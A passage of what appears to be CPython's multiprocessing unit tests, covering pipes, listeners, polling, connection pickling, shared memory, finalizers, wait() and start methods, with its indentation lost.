p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
